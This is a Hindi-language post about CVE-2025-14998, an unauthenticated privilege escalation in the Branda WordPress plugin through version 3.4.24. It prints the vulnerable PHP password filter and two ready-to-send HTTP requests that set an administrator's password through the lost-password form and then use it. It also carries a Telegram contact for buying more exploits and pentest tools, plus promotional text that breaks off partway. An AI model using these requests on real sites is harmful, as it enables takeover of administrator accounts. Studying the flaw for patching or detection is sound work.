
CVE-2025-14998 वर्डप्रेस प्लगइन - Branda – व्हाइट लेबल और ब्रांडिंग, मुफ्त लॉगिन पेज कस्टमाइज़र <= 3.4.24 - बिना प्रमाणीकरण के खाता अधिग्रहण के माध्यम से विशेषाधिकार वृद्धि
CVE-2025-14998 WordPress के लिए Branda प्लगइन 3.4.24 तक के सभी संस्करणों में खाता अधिग्रहण के माध्यम से विशेषाधिकार वृद्धि के प्रति संवेदनशील है। ऐसा इसलिए है क्योंकि प्लगइन उपयोगकर्ता का पासवर्ड अपडेट करने से पहले उसकी पहचान को ठीक से सत्यापित नहीं करता है। यह बिना प्रमाणीकरण वाले हमलावरों के लिए किसी भी उपयोगकर्ता का पासवर्ड बदलना संभव बनाता है, जिसमें व्यवस्थापक भी शामिल हैं, और इसका उपयोग करके उनके खाते तक पहुँच प्राप्त कर सकते हैं।
अधिक WordPress कमजोरियों और विशेष पेंटेस्ट टूल्स के लिए मुझसे टेलीग्राम पर संपर्क करें @KtN1990।
प्लगइन WordPress की पासवर्ड जनरेशन लॉजिक को random_password फिल्टर में हुक करके ओवरराइड करता है।
WordPress को सुरक्षित रैंडम पासवर्ड उत्पन्न करने की अनुमति देने के बजाय, प्लगइन उसे उपयोगकर्ता-नियंत्रित इनपुट से बदल देता है।
public function password_random_password_filter( $password ) {
global $wpdb, $signup_password_use_encryption;
if ( isset( $_GET['key'] ) && ! empty( $_GET['key'] ) ) {
$key = $_GET['key'];
} elseif ( isset( $_POST['key'] ) && ! empty( $_POST['key'] ) ) {
$key = $_POST['key'];
}
if ( ! empty( $_POST['password_1'] ) ) {
$password = $_POST['password_1'];
} elseif ( ! empty( $key ) ) {
$signup = $wpdb->get_row(
$wpdb->prepare(
"SELECT * FROM $wpdb->signups WHERE activation_key = '%s'",
$key
)
);
if ( ! ( empty( $signup ) || $signup->active ) ) {
$meta = maybe_unserialize( $signup->meta );
if ( ! empty( $meta['password'] ) ) {
if ( 'yes' === $signup_password_use_encryption ) {
$password = $this->password_decrypt( $meta['password'] );
} else {
$password = $meta['password'];
}
}
}
}
return $password;
}
POST /wp/wp-login.php?action=lostpassword HTTP/1.1
Host: example.local
Content-Type: application/x-www-form-urlencoded
user_login=admin&
redirect_to=&
password_1=EfUSmvnTun5XbvE6RvIB&
wp-submit=Get+New+Password
password_1 का मान कोई भी हमलावर-नियंत्रित स्ट्रिंग हो सकता है।
GET /wp/wp-login.php?login=admin&key=EfUSmvnTun5XbvE6RvIB&action=rp HTTP/1.1
Host: example.local
किसी ईमेल एक्सेस या मान्य पासवर्ड रीसेट टोकन की आवश्यकता नहीं है।
एक बिना प्रमाणीकृत हमलावर निम्न कार्य कर सकता है:

-🛡️ इसके लिए आदर्श: – सुरक्षा शोधकर्ता – पैठ परीक्षक – नैतिक हैकर
📦 ~230 विरासती शोध मॉड्यूल के साथ अनुरक्षित; स्थिरता और पहचान के लिए हालिया स्कैनर कोर सुधार।
🎯 उद्देश्य: यह विशेष रूप से अधिकृत सुरक्षा परीक्षण, शिक्षा, रक्षात्मक अनुसंधान और रेड-टीम प्रशिक्षण के लिए प्रदान किया जाता है। यह रिलीज़ अवैध उपयोग के लिए नहीं है। वितरण प्रतिबंधित है — सत्यापन और हस्ताक्षरित उत्तरदायी उपयोग समझौते / NDA के बाद ही पहुँच मिलती है।
-🛡️ उत्तरदायी पहुँच नीति (सारांश):